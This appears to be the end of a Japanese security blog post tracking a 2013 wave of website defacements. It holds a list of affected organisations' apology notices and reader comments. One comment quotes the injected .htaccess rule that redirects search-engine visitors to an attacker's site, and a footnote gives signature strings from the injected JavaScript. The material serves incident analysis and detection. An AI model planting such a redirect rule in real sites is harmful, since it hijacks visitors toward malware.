*69弊社サイトのウィルス感染に関するお詫びとご報告,ミノウラ,2013/06/07アクセス:魚拓

*70サイト復活しました!,日本デオドール,2013/06/07アクセス:魚拓

*71【重要】大富士フットボールクラブホームページは安全に閲覧していただけます。,2013/06/07アクセス:魚拓

*72ファイル改ざん,葉鍼灸院,2013/06/07アクセス:魚拓

*73ホームページのコンピューターウイルス感染のご報告とお詫び,板橋区立成増小学校支援地域本部,2013/06/07アクセス:魚拓

*74【CRAZY TVよりホームページに関するお詫びとお知らせ】,CRAZY TV,2013/06/09アクセス:魚拓

*75ホームページに関するお知らせとお詫び,かなえるリンク,2013/06/09アクセス:魚拓

*76ホームページ改ざんに関するお知らせとお詫び,緑秀会田無病院2013/06/09アクセス:魚拓

*77WEBサイト改ざんに関するお詫びとお知らせ,ドゥ・ハウス,2013/06/09:魚拓

*78ホームページ改ざんに関するお詫びとお知らせ,札幌静修高等学校,2013/06/09アクセス:魚拓

*79緊急システムメンテナンスのお知らせ,日本文化出版株式会社,2013/06/09アクセス:魚拓

*80:(PDFホームページ改ざんに関するお知らせとお詫び,海洋研究開発機構,2013/06/09アクセス

*81「当サイトの改ざんに関するお詫び」,ゑびすや,2013/06/09アクセス:魚拓

*82マルウェア警告に関するお詫びとお願い,すみだ産業会館,2013/06/09アクセス:魚拓

*83電子図書室サービス改ざんに関するお詫びとお知らせ,地盤工学会,2013/06/09アクセス

*84:(PDF不正アクセスによるホームページの改ざんに関するお詫び,愛知・豊川用水振興協会,2013/06/10アクセス

*85弊社サイトの改ざんに関するお詫び,栄信電気工業,2013/06/10アクセス:魚拓

*86当サイトの、全一時停止について・・・,登録紹介宣伝あくせすくん,2013/06/10アクセス:魚拓

*87当社ホームページのウィルス感染に関するお詫びとお知らせ,日本赤十字社,2013/06/10アクセス:魚拓

*88当サイト改ざんに関するお知らせとお詫び,HKS,2013/06/11アクセス:魚拓

*89:(PDF重要なお知らせ ホームページ改ざんに関するお知らせとお詫び,石川県教職員互助会,2013/06/11アクセス

*90:(PDF弊社ホームページ改ざんに関するお詫びとご報告,アクア,2013/06/11アクセス

*91[重要なお知らせ]ホームページ改ざんに関するお知らせとお詫び,国立民族学博物館,2013/06/11アクセス:魚拓

*92当事務所HP改ざんに関するお詫びとお知らせ,長谷川敬税理士事務所,2013/06/11アクセス:魚拓

*93ホームページ改ざんに関するお知らせとお詫び,TokiwagiFC Fan,2013/06/11アクセス:魚拓

*94☆友の会HP再開☆,東京こけし友の会,2013/06/11アクセス:魚拓

*9505月28日から同月31日にかけ、下記3サイトが海外から不正アクセスと改ざんを受けました。,ΜΟΟΥΣΕΊΟΝ,2013/06/11アクセス:魚拓

*96<重要> 当社ホームページ改ざんに関するお詫び,松菱金属工業,2013/06/13アクセス:魚拓

*97お客様にお詫びとお願い,日本グラフィックサービス工業会,2013/06/13アクセス:魚拓

*98「当サイトの改ざんに関するお詫び」,盛岡三菱自動車販売,2013/06/13アクセス:魚拓

*99ホームページ改ざんに関するお知らせ,北海道文化財団,2013/06/13アクセス:魚拓

*100お詫びとお知らせ,現代屋,2013/06/13アクセス:魚拓

*101不正アクセスによるサイト改ざんについて,さうすウェーブ,2013/06/13アクセス:魚拓

*102当院ウェブサイト改ざんに関するお知らせとお詫び,湘南鎌倉総合病院,2013/06/13アクセス:魚拓

*103:今回の改ざんで埋め込まれるJavaScriptとして報告されている特定の文字列の一部(『0c0896』や『catch(d21vd12v)』『ps="split";asd=function』)がGoogleの検索履歴に表示されるキャッシュに残っていたサイト

*104:検索で引っ掛かる場合の多くがこの毒入れ失敗パターンだとか。

*105:ただし相当数のサイトで改ざんされた時期が重なっており、人為的に行うのは相応の人数がいなければ難しいように思います。

*106:他には「ソフトウェア脆弱性が放置されていた」、「単純なID、パスワードを使っていた」、「そもそも誰でも更新できる状況だった」も原因として考えられるでしょう。

MASAKIMASAKI 2013/06/05 22:18 .htaccessに追記されているのも確認しました。
追記内容は以下の通りです。
#0c0896#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://転送先URL [R=301,L]
</IfModule>

#/0c0896#

piyokangopiyokango 2013/06/06 02:29 情報ありがとうございます。記事中に引用させていただきました。

MASAKIMASAKI 2013/06/06 12:24 掲載ありがとうございます。

私の方でリダイレクト処理の追記を現在確認しているファイルの拡張子は「.html」「.php」「.js」「.json」「.tpl」です。
「.json」「.tpl」は見落としがちかと思いますので、追加情報になるのかわかりませんが続けてコメントさせていただきました。

piyokangopiyokango 2013/06/06 13:00 たびたび貴重な情報をありがとうございます。
改ざん対象として確認されている拡張子の一覧に頂いた情報を追加させていただきました。

カラオケ先生♪カラオケ先生♪ 2013/06/06 15:33 piyokangoさん初めまして♪改ざんサイトのリストに入っています
「☆脱!カラオケコンプレックス」運営者のカラオケ先生こと北森@Arcadiaと申します。
調査を続けたところ、ウィルス対策ソフトに引っかからない、
JAVAの脆弱性をついて侵入するアドウェアらしきものが発見されました。
おそらくこれに私のFTP通信をロギングされていたものと思われます。
調査結果は後日ブログかサイトに追記いたします。
のちほど、こちらのサイトへのリンクを貼らせて下さい。
よろしくお願いいたします。

piyokangopiyokango 2013/06/06 17:33 こんにちは。ご連絡ありがとうございます。
もし検体が確保できるようであれば、ハッシュ値やVirustotalのスキャン結果を共有頂けると大変ありがたいです。

SasuraiSasurai 2013/06/08 07:37 大変有用な情報かと思いますが、イラスト中の「攻撃者」のイメージがFreeBSDプロジェクトのマスコットキャラクターに似ており、一般の方から誤解を受けるのではないかと思います。